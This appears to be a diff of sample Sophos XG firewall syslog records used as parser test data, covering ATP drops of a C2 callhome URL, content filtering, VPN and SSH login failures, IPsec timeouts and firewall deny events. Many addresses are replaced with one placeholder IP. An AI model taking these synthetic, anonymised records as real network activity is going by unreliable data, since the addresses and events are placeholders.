ep_uuid= execution_path="" +<30>device="SFW" date=2020-05-18 time=14:38:34 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=086504418010 log_type="ATP" log_component="Web" log_subtype="Drop" priority=Warning user_name="" protocol="TCP" src_port=57579 dst_port=80 sourceip=175.16.199.1 destinationip=175.16.199.1 url=http://sophostest.com/callhome/index.html threatname=C2/Generic-A eventid=E91DAD80-BDE4-4682-B7E8-FE394B70A36C eventtype="Standard" login_user="" process_user="" ep_uuid="" execution_path="" +<30>device="SFW" date=2020-05-18 time=14:38:35 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=086504418010 log_type="ATP" log_component="Web" log_subtype="Drop" priority=Warning user_name="" protocol="TCP" src_port=57540 dst_port=80 sourceip=175.16.199.1 destinationip=175.16.199.1 url=http://sophostest.com/callhome/index.html threatname=C2/Generic-A eventid=34AC8531-E7C0-4368-9978-5740952EE9AB eventtype="Standard" login_user="" process_user="" ep_uuid="" execution_path="" +<30>device="SFW" date=2018-06-05 time=08:49:00 timezone="BST" device_name="XG310" device_id=C30006T22TGR89B log_id=086320518009 log_type="ATP" log_component="Firewall" log_subtype="Alert" priority=Notice user_name="" protocol="ICMP" src_port=0 dst_port=0 sourceip=10.198.32.89 destinationip=175.16.199.1 url=175.16.199.1 threatname=C2/Generic-A eventid=C7E26E6F-0097-4EA2-89DE-C31C40636CB2 eventtype="Standard" login_user="" process_user="" ep_uuid= execution_path="" +<30>device="SFW" date=2017-01-31 time=14:03:33 timezone="IST" device_name="CR750iNG-XP" device_id=C44310050024-P29PUA log_id=050901616001 log_type="Content Filtering" log_component="HTTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=2 user_name="jsmith" user_gp="Open Group" iap=1 category="Entertainment" category_type="Unproductive" url="https://r8---sn-ci5gup-qxas.googlevideo.com/" contenttype="" override_token="" httpresponsecode="" src_ip=10.198.47.71 dst_ip=175.16.199.1 
protocol="TCP" src_port=9444 dst_port=443 sent_bytes=0 recv_bytes=319007 domain=r8---sn-ci5gup-qxas.googlevideo.com exceptions= activityname="" reason="" +<30>device="SFW" date=2017-02-01 time=18:20:21 timezone="IST" device_name="SG115" device_id=S110000E28BA631 log_id=050902616002 log_type="Content Filtering" log_component="HTTP" log_subtype="Denied" status="" priority=Information fw_rule_id=1 user_name="" user_gp="" iap=13 category="Religion & Spirituality" category_type="Unproductive" url="http://hanuman.com/" contenttype="" override_token="" httpresponsecode="" src_ip=175.16.199.1 dst_ip=175.16.199.1 protocol="TCP" src_port=46719 dst_port=80 sent_bytes=0 recv_bytes=0 domain=hanuman.com exceptions= activityname="" +<30>device="SFW" date=2017-02-01 time=18:13:29 timezone="IST" device_name="SG115" device_id=S110016E28BA631 log_id=054402617051 log_type="Content Filtering" log_component="Application" log_subtype="Denied" priority=Information fw_rule_id=1 user_name="" user_gp="" application_filter_policy=8 category="Mobile Applications" application_name="Gtalk Android" application_risk=4 application_technology="Client Server" application_category="Mobile Applications" src_ip=175.16.199.1 src_country_code=DEU dst_ip=175.16.199.1 dst_country_code=USA protocol="TCP" src_port=49128 dst_port=5228 sent_bytes=0 recv_bytes=0 status="Deny" message="" +<30>device="SFW" date=2020-05-18 time=14:38:51 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=050901616001 log_type="Content Filtering" log_component="HTTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=2 user_name="" user_gp="" iap=13 category="Information Technology" category_type="Acceptable" url="https://his-eur1-neur1.servicebus.windows.net/$servicebus/websocket" contenttype="" override_token="" httpresponsecode="" src_ip=175.16.199.1 dst_ip=175.16.199.1 protocol="TCP" src_port=62851 dst_port=443 sent_bytes=259 recv_bytes=168 domain=his-eur1-neur1.servicebus.windows.net exceptions="" 
activityname="" reason="" user_agent="" status_code="400" transactionid="" referer="" download_file_name="" download_file_type="" upload_file_name="" upload_file_type="" con_id=80042000 application="" app_is_cloud=0 override_name="" override_authorizer="" +<30>device="SFW" date=2020-05-18 time=14:38:52 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=050902616002 log_type="Content Filtering" log_component="HTTP" log_subtype="Denied" status="" priority=Information fw_rule_id=51 user_name="" user_gp="" iap=2 category="IPAddress" category_type="Acceptable" url="https://175.16.199.1/" contenttype="" override_token="" httpresponsecode="" src_ip=175.16.199.1 dst_ip=175.16.199.1 protocol="TCP" src_port=60471 dst_port=443 sent_bytes=0 recv_bytes=0 domain=175.16.199.1 exceptions="" activityname="" reason="" user_agent="" status_code="200" transactionid="" referer="" download_file_name="" download_file_type="" upload_file_name="" upload_file_type="" con_id=642960832 application="" app_is_cloud=0 override_name="" override_authorizer="" +<30>device="SFW" date=2020-05-18 time=14:38:53 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=050901616001 log_type="Content Filtering" log_component="HTTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=2 user_name="" user_gp="" iap=13 category="Information Technology" category_type="Acceptable" url="http://update.eset.com/eset_upd/ep7/dll/update.ver.signed" contenttype="" override_token="" httpresponsecode="" src_ip=175.16.199.1 dst_ip=175.16.199.1 protocol="TCP" src_port=65391 dst_port=80 sent_bytes=980 recv_bytes=295 domain=update.eset.com exceptions=av,https,sandstorm activityname="" reason="" user_agent="EFSW Update (Windows; U; 64bit; BPC 7.1.12010.0; OS: 10.0.17763 SP 0.0 NT; TDB 45511; CL 1.1.1; x64s; APP efsw; PX 1; PUA 1; CD 1; RA 1; PEV 0; UNS 1; UBR 1158; HVCI 0; SHA256 1; WU 3; HWF: 01009DAA-757A-D666-EFD2-92DD0D501284; PLOC de_de; PCODE 211.0.0; " status_code="304" 
transactionid="" referer="" download_file_name="" download_file_type="" upload_file_name="" upload_file_type="" con_id=248426360 application="" app_is_cloud=0 override_name="" override_authorizer="" <30>device="SFW" date=2016-12-02 time=18:50:20 timezone="GMT" device_name="SF01V" device_id=1234567890123456 log_id=058420116010 log_type="Content Filtering" log_component="Web Content Policy" log_subtype="Alert" user="gi123456" src_ip=10.108.108.49 transaction_id="e4a127f7-a850-477c-920e-a471b38727c1" dictionary_name="complicated_Custom" site_category=Information Technology website="ta-web-static-testing.qa. astaro.de" direction="in" action="Deny" file_name="cgi_echo.pl" context_match="Not" context_prefix="blah blah hello " context_suffix=" hello blah " -<30>device="SFW" date=2016-12-02 time=18:50:20 timezone="GMT" device_name="SFVUNL" device_id=C01001K234RXPA1 log_id=050927616005 log_type="Content Filtering" log_component="HTTP" log_subtype="Warned" status="" priority=Information fw_rule_id=2 user_name="rich" user_gp="Clientless Open Group" iap=13 category="Search Engines" category_type="Acceptable" url="http://www.google.com/" contenttype="" override_token="" httpresponsecode="" src_ip=192.168.73.220 dst_ip=64.233.189.147 protocol="TCP" src_port=37832 dst_port=80 sent_bytes=0 recv_bytes=0 domain=www.google.com exceptions= activityname=" Search" reason="" -<30>device="SFW" date=2016-12-02 time=18:50:22 timezone="GMT" device_name="SFVUNL" device_id=C01001K234RXPA1 log_id=050901616006 log_type="Content Filtering" log_component="HTTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=2 user_name="rich" user_gp="Clientless Open Group" iap=13 category="Search Engines" category_type="Acceptable" url="http://www.google.ca/?gfe_rd=cr&ei=ojxHWP3WC4WN8QeRioDABw" contenttype="text/html" override_token="" httpresponsecode="" src_ip=192.168.73.220 dst_ip=64.233.188.94 protocol="TCP" src_port=46322 dst_port=80 sent_bytes=0 recv_bytes=619 domain=www.google.ca 
exceptions= activityname="Search" reason="not eligible" -<30>device="SFW" date=2020-05-18 time=14:38:57 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062910617701 log_type="Event" log_component="Firewall Authentication" log_subtype="Authentication" status="Successful" priority=Information user_name="elastic.user@elastic.test.com" usergroupname="Open Group" auth_client="CTA" auth_mechanism="AD" reason="" src_ip=172.17.35.116 message="User elastic.user@elastic.test.com of group Open Group logged in successfully to Firewall through AD authentication mechanism from 172.17.35.116" name="elastic.user@elastic.test.com" src_mac= -<30>device="SFW" date=2020-05-18 time=14:38:58 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062511418055 log_type="Event" log_component="IPSec" log_subtype="System" status="Failed" priority=Warning user_name="elastic.user@elastic.test.com" connectionname="Location-1" connectiontype="0" localinterfaceip=214.167.51.66 localgateway="" localnetwork="172.17.32.0/19" remoteinterfaceip=83.20.132.250 remotenetwork="10.84.234.5/32" message="location-1 - IKE message retransmission timed out (Remote: 83.20.132.250)" +<30>device="SFW" date=2016-12-02 time=18:50:20 timezone="GMT" device_name="SFVUNL" device_id=C01001K234RXPA1 log_id=050927616005 log_type="Content Filtering" log_component="HTTP" log_subtype="Warned" status="" priority=Information fw_rule_id=2 user_name="rich" user_gp="Clientless Open Group" iap=13 category="Search Engines" category_type="Acceptable" url="http://www.google.com/" contenttype="" override_token="" httpresponsecode="" src_ip=192.168.73.220 dst_ip=175.16.199.1 protocol="TCP" src_port=37832 dst_port=80 sent_bytes=0 recv_bytes=0 domain=www.google.com exceptions= activityname=" Search" reason="" +<30>device="SFW" date=2016-12-02 time=18:50:22 timezone="GMT" device_name="SFVUNL" device_id=C01001K234RXPA1 log_id=050901616006 log_type="Content Filtering" log_component="HTTP" 
log_subtype="Allowed" status="" priority=Information fw_rule_id=2 user_name="rich" user_gp="Clientless Open Group" iap=13 category="Search Engines" category_type="Acceptable" url="http://www.google.ca/?gfe_rd=cr&ei=ojxHWP3WC4WN8QeRioDABw" contenttype="text/html" override_token="" httpresponsecode="" src_ip=192.168.73.220 dst_ip=175.16.199.1 protocol="TCP" src_port=46322 dst_port=80 sent_bytes=0 recv_bytes=619 domain=www.google.ca exceptions= activityname="Search" reason="not eligible" +<30>device="SFW" date=2020-05-18 time=14:38:57 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062910617701 log_type="Event" log_component="Firewall Authentication" log_subtype="Authentication" status="Successful" priority=Information user_name="elastic.user@elastic.test.com" usergroupname="Open Group" auth_client="CTA" auth_mechanism="AD" reason="" src_ip=175.16.199.1 message="User elastic.user@elastic.test.com of group Open Group logged in successfully to Firewall through AD authentication mechanism from 175.16.199.1" name="elastic.user@elastic.test.com" src_mac= +<30>device="SFW" date=2020-05-18 time=14:38:58 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062511418055 log_type="Event" log_component="IPSec" log_subtype="System" status="Failed" priority=Warning user_name="elastic.user@elastic.test.com" connectionname="Location-1" connectiontype="0" localinterfaceip=175.16.199.1 localgateway="" localnetwork="175.16.199.1/19" remoteinterfaceip=175.16.199.1 remotenetwork="10.84.234.5/32" message="location-1 - IKE message retransmission timed out (Remote: 175.16.199.1)" <30>device="SFW" date=2020-05-18 time=14:38:59 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062511318057 log_type="Event" log_component="IPSec" log_subtype="System" status="Expire" priority=Error user_name="" connectionname="" connectiontype="0" localinterfaceip="" localgateway="" localnetwork="" remoteinterfaceip="" remotenetwork="" message="IKE_SA 
timed out before it could be established"
-<30>device="SFW" date=2020-05-18 time=14:39:00 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063210617704 log_type="Event" log_component="My Account Authentication" log_subtype="Authentication" status="Successful" priority=Information user_name="elastic.user@elastic.test.com" usergroupname="" auth_client="N/A" auth_mechanism="Local" reason="" src_ip=83.9.140.96 message="User elastic.user@elastic.test.com logged in successfully to MyAccount through Local authentication mechanism" name="" src_mac=
+<30>device="SFW" date=2020-05-18 time=14:39:00 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063210617704 log_type="Event" log_component="My Account Authentication" log_subtype="Authentication" status="Successful" priority=Information user_name="elastic.user@elastic.test.com" usergroupname="" auth_client="N/A" auth_mechanism="Local" reason="" src_ip=175.16.199.1 message="User elastic.user@elastic.test.com logged in successfully to MyAccount through Local authentication mechanism" name="" src_mac=
 <30>device="SFW" date=2020-05-18 time=14:39:01 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=064011517819 log_type="Event" log_component="Anti-Virus" log_subtype="System" priority=Notice status="Successful" oldversion=1.0.407794 newversion=1.0.407795 message="Avira AV definitions upgraded from 1.0.407794 to 1.0.407795."
<30>device="SFW" date=2020-05-18 time=14:39:02 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=063411660022 log_type="Event" log_component="DHCP Server" log_subtype="System" status="Expire" priority=Information ipaddress="192.168.110.10" client_physical_address="-" client_host_name="" message="Lease 192.168.110.10 expired" raw_data="192.168.110.10" -<30>device="SFW" date=2020-05-18 time=14:39:03 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063110617710 log_type="Event" log_component="SSL VPN Authentication" log_subtype="Authentication" status="Successful" priority=Information user_name="elastic.user@elastic.test.com" usergroupname="" auth_client="N/A" auth_mechanism="AD" reason="" src_ip=217.250.157.135 message="User elastic.user@elastic.test.com authenticated successfully to login to SSLVPN through AD authentication mechanism" name="" src_mac= +<30>device="SFW" date=2020-05-18 time=14:39:03 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063110617710 log_type="Event" log_component="SSL VPN Authentication" log_subtype="Authentication" status="Successful" priority=Information user_name="elastic.user@elastic.test.com" usergroupname="" auth_client="N/A" auth_mechanism="AD" reason="" src_ip=175.16.199.1 message="User elastic.user@elastic.test.com authenticated successfully to login to SSLVPN through AD authentication mechanism" name="" src_mac= <30>device="SFW" date=2020-05-18 time=14:39:04 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062811617824 log_type="Event" log_component="SSL VPN" log_subtype="System" priority=Information Mode="Remote Access" sessionid="" starttime=0 user_name="elastic.user@elastic.test.com" ipaddress=10.82.234.5 sent_bytes=0 recv_bytes=0 status="Established" message="SSL VPN User 'elastic.user@elastic.test.com' connected " timestamp=1589960866 connectionname="" remote_ip=10.82.234.12 -<30>device="SFW" date=2020-05-18 time=14:39:05 timezone="CEST" 
device_name="XG230" device_id=1234567890123456 log_id=063010517708 log_type="Event" log_component="VPN Authentication" log_subtype="Authentication" status="Failed" priority=Notice user_name="hendrikl" usergroupname="" auth_client="N/A" auth_mechanism="AD,AD,Local" reason="wrong credentials" src_ip=91.67.201.4 message="User elastic01 failed to login to VPN through AD,AD,Local authentication mechanism because of wrong credentials" name="" src_mac= +<30>device="SFW" date=2020-05-18 time=14:39:05 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063010517708 log_type="Event" log_component="VPN Authentication" log_subtype="Authentication" status="Failed" priority=Notice user_name="hendrikl" usergroupname="" auth_client="N/A" auth_mechanism="AD,AD,Local" reason="wrong credentials" src_ip=175.16.199.1 message="User elastic01 failed to login to VPN through AD,AD,Local authentication mechanism because of wrong credentials" name="" src_mac= <30>device="SFW" date=2020-05-18 time=14:39:06 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=066911518017 log_type="Event" log_component="ATP" log_subtype="System" priority=Notice status="Successful" oldversion=1.0.0297 newversion=1.0.0298 message="ATP definitions upgraded from 1.0.0297 to 1.0.0298." 
<30>device="SFW" date=2020-05-18 time=14:39:07 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=062009617502 log_type="Event" log_component="GUI" log_subtype="Admin" status="Successful" priority=Information user_name="admin" src_ip=10.83.234.5 SysLog_SERVER_NAME='Logstash' message="SysLog Server 'Logstash' settings were changed by 'admin' from '10.83.234.5' using 'GUI'"
-<30>device="SFW" date=2020-05-18 time=14:39:08 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062109517507 log_type="Event" log_component="CLI" log_subtype="Admin" status="Failed" priority=Notice user_name="root" src_ip=172.66.35.15 message="User 'root' failed to login from '172.66.35.15' using ssh because of wrong credentials"
+<30>device="SFW" date=2020-05-18 time=14:39:08 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062109517507 log_type="Event" log_component="CLI" log_subtype="Admin" status="Failed" priority=Notice user_name="root" src_ip=175.16.199.1 message="User 'root' failed to login from '175.16.199.1' using ssh because of wrong credentials"
 <30>device="SFW" date=2020-05-18 time=14:39:09 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063911517818 log_type="Event" log_component="IPS" log_subtype="System" priority=Notice status="Successful" oldversion=9.17.09 newversion=9.17.10 message="IPS definitions upgraded from 9.17.09 to 9.17.10."
 <30>device="SFW" date=2020-05-18 time=14:39:10 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063311617923 log_type="Event" log_component="Appliance" log_subtype="System" priority=Information backup_mode='appliance' message="Scheduled backup to appliance is successful."
<30>device="SFW" date=2020-05-18 time=14:39:20 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=062910617703 log_type="Event" log_component="Firewall Authentication" log_subtype="Authentication" status="Successful" priority=Information user_name="elastic.user@elastic.test.com" usergroupname="VPN.SSL.Users.elastic" auth_client="IPSec" auth_mechanism="N/A" reason="" src_ip=10.84.234.38 src_mac="" start_time=1591086575 sent_bytes=0 recv_bytes=0 message="User elastic.user@elastic.test.com was logged out of firewall" name="elastic.user@elastic.test.com" timestamp=1591086576 
@@ -49,29 +49,29 @@
 <30>device="SFW" date=2017-03-16 time=12:53:27 timezone="IST" device_name="XG125w" device_id=S1601E1F9FCB7EE log_id=066811618015 log_type="Event" log_component="RED" log_subtype="System" priority=Information red_id=A350196C47072B0 status="Disconnected" eventtime="2017-03-16 12:53:27 IST" duration=0 branch_name=Gaurav Patel recv_bytes=31488 sent_bytes=22368 message="A350196C47072B0/Gaurav Patel is now disconnected"
 <30>device="SFW" date=2017-03-16 time=12:46:26 timezone="IST" device_name="XG125w" device_id=S1601E1F9FCB7EE log_id=066811618016 log_type="Event" log_component="RED" log_subtype="System" priority=Information red_id=A350196C47072B0 status="Interim" eventtime="2017-03-16 12:46:26 IST" duration=0 branch_name=NY recv_bytes=0 sent_bytes=0 message="A350196C47072B0/NY transfered bytes TX: 0 RX: 0"
 <30>device="SFW" date=2018-06-06 time=11:12:10 timezone="IST" device_name="SG430" device_id=S4000806149EE49 log_id=063711517815 log_type="Event" log_component="DDNS" log_subtype="System" status="Success" priority=Notice host=test1. customtest.dyndns.org updatedip=10.198.232.86 reason="" message="DDNS update for host test1.customtest.dyndns.org was Successful. Updated with IP 10.198.232.86."
-<30>device="SFW" date=2020-05-18 time=14:38:37 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010101600001 log_type="Firewall" log_component="Firewall Rule" log_subtype="Allowed" status="Allow" priority=Information duration=11 fw_rule_id=21 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="HTTP" application_risk=1 application_technology="Browser Based" application_category="General Internet" in_interface="Port1" out_interface="Port2" src_mac=00:00:00:00:00:00 src_ip=172.17.34.15 src_country_code=R1 dst_ip=91.228.167.86 dst_country_code=SVK protocol="TCP" src_port=62841 dst_port=80 sent_pkts=6 recv_pkts=5 sent_bytes=459 recv_bytes=606 tran_src_ip=213.167.51.66 tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="LAN" srczone="LAN" dstzonetype="WAN" dstzone="WAN" dir_disp="" connevent="Stop" connid="1617925280" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 -<30>device="SFW" date=2020-05-18 time=14:38:38 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=010101600001 log_type="Firewall" log_component="Firewall Rule" log_subtype="Allowed" status="Allow" priority=Information duration=0 fw_rule_id=67 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=15 appfilter_policy_id=0 application="DNS" application_risk=1 application_technology="Network Protocol" application_category="Infrastructure" in_interface="Port3.400" out_interface="Port2" src_mac=00:00:00:00:00:00 src_ip=172.16.66.155 src_country_code=R1 dst_ip=91.228.165.117 dst_country_code=SVK protocol="UDP" src_port=49144 dst_port=53 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=185.8.209.194 tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="DMZ" srczone="DMZ" dstzonetype="WAN" dstzone="WAN" dir_disp="" connevent="Start" connid="3360392048" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 -<30>device="SFW" 
date=2020-05-18 time=14:38:39 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010102600002 log_type="Firewall" log_component="Firewall Rule" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=29 policy_type=1 user_name="" user_gp="" iap=2 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port1" out_interface="Port2" src_mac=24:01:c7:07:2b:a2 src_ip=172.17.35.113 src_country_code="" dst_ip=172.20.4.52 dst_country_code="" protocol="TCP" src_port=53287 dst_port=4980 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 +<30>device="SFW" date=2020-05-18 time=14:38:37 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010101600001 log_type="Firewall" log_component="Firewall Rule" log_subtype="Allowed" status="Allow" priority=Information duration=11 fw_rule_id=21 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="HTTP" application_risk=1 application_technology="Browser Based" application_category="General Internet" in_interface="Port1" out_interface="Port2" src_mac=00:00:00:00:00:00 src_ip=175.16.199.1 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=SVK protocol="TCP" src_port=62841 dst_port=80 sent_pkts=6 recv_pkts=5 sent_bytes=459 recv_bytes=606 tran_src_ip=175.16.199.1 tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="LAN" srczone="LAN" dstzonetype="WAN" dstzone="WAN" dir_disp="" connevent="Stop" connid="1617925280" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 +<30>device="SFW" date=2020-05-18 time=14:38:38 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=010101600001 
log_type="Firewall" log_component="Firewall Rule" log_subtype="Allowed" status="Allow" priority=Information duration=0 fw_rule_id=67 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=15 appfilter_policy_id=0 application="DNS" application_risk=1 application_technology="Network Protocol" application_category="Infrastructure" in_interface="Port3.400" out_interface="Port2" src_mac=00:00:00:00:00:00 src_ip=175.16.199.1 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=SVK protocol="UDP" src_port=49144 dst_port=53 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=175.16.199.1 tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="DMZ" srczone="DMZ" dstzonetype="WAN" dstzone="WAN" dir_disp="" connevent="Start" connid="3360392048" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 +<30>device="SFW" date=2020-05-18 time=14:38:39 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010102600002 log_type="Firewall" log_component="Firewall Rule" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=29 policy_type=1 user_name="" user_gp="" iap=2 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port1" out_interface="Port2" src_mac=24:01:c7:07:2b:a2 src_ip=175.16.199.1 src_country_code="" dst_ip=175.16.199.1 dst_country_code="" protocol="TCP" src_port=53287 dst_port=4980 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 <30>device="SFW" date=2020-05-18 time=14:38:40 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010102600002 log_type="Firewall" log_component="Firewall Rule" log_subtype="Denied" status="Deny" priority=Information duration=0 
fw_rule_id=29 policy_type=1 user_name="elastic@user.local" user_gp="elastic.group.local" iap=2 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="tun0" out_interface="Port1" src_mac="" src_ip=10.82.234.6 src_country_code="" dst_ip=192.168.0.1 dst_country_code="" protocol="TCP" src_port=60102 dst_port=53 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 -<30>device="SFW" date=2020-05-18 time=14:38:41 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=010302602002 log_type="Firewall" log_component="Appliance Access" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port2" out_interface="" src_mac=c4:f7:d5:b5:47:f4 src_ip=51.77.56.9 src_country_code="" dst_ip=185.7.209.207 dst_country_code="" protocol="TCP" src_port=55039 dst_port=18 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 -<30>device="SFW" date=2020-05-18 time=14:38:42 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010102600002 log_type="Firewall" log_component="Firewall Rule" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=29 policy_type=1 user_name="elastic@user.local" user_gp="elastic.group.local" iap=2 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" 
application_category="" in_interface="Port1" out_interface="Port2" src_mac=24:01:c7:07:2b:a2 src_ip=172.17.35.101 src_country_code="" dst_ip=192.168.5.11 dst_country_code="" protocol="TCP" src_port=51826 dst_port=1109 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 -<30>device="SFW" date=2020-05-18 time=14:38:43 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=010402403001 log_type="Firewall" log_component="DoS Attack" log_subtype="Denied" status="Deny" priority=Warning duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port1" out_interface="" src_mac=34:db:fd:83:d8:09 src_ip=172.16.36.105 src_country_code="" dst_ip=10.84.234.14 dst_country_code="" protocol="UDP" src_port=3389 dst_port=64465 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 +<30>device="SFW" date=2020-05-18 time=14:38:41 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=010302602002 log_type="Firewall" log_component="Appliance Access" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port2" out_interface="" src_mac=c4:f7:d5:b5:47:f4 src_ip=175.16.199.1 src_country_code="" dst_ip=175.16.199.1 dst_country_code="" protocol="TCP" src_port=55039 dst_port=18 
sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 +<30>device="SFW" date=2020-05-18 time=14:38:42 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010102600002 log_type="Firewall" log_component="Firewall Rule" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=29 policy_type=1 user_name="elastic@user.local" user_gp="elastic.group.local" iap=2 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port1" out_interface="Port2" src_mac=24:01:c7:07:2b:a2 src_ip=175.16.199.1 src_country_code="" dst_ip=192.168.5.11 dst_country_code="" protocol="TCP" src_port=51826 dst_port=1109 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 +<30>device="SFW" date=2020-05-18 time=14:38:43 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=010402403001 log_type="Firewall" log_component="DoS Attack" log_subtype="Denied" status="Deny" priority=Warning duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port1" out_interface="" src_mac=34:db:fd:83:d8:09 src_ip=175.16.199.1 src_country_code="" dst_ip=10.84.234.14 dst_country_code="" protocol="UDP" src_port=3389 dst_port=64465 sent_pkts=0 recv_pkts=0 